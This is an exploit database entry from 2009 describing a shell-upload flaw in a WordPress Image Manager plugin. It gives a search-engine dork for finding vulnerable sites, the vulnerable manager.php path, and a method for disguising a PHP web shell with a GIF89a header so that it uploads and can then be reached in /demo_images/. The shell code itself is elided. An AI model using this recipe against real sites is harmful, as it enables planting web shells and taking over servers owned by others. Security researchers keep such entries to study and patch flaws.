WordPress Plugin Image Manager - Arbitrary File Upload

EDB-ID:

10325

CVE:

N/A

Author:

DigitALL

Type:

webapps

Platform:

PHP

Published:

2009-12-05

# Exploit Title: Wordpress Image Manager Plugins Shell Upload Vulnerability

# Version: No Version All WordPress Systems

# Thanks ; Zombie KroNickq and All 1923Turk.biz Members
# Special Thanks ; Cyb3rking

Dork: inurl:"/plugins/ImageManager/manager.php"

/plugins/ImageManager/manager.php

Your Shell Top

GIF89a;
<?
-----
?>

And Upload Your Shell. Your Shell Go To /demo_images/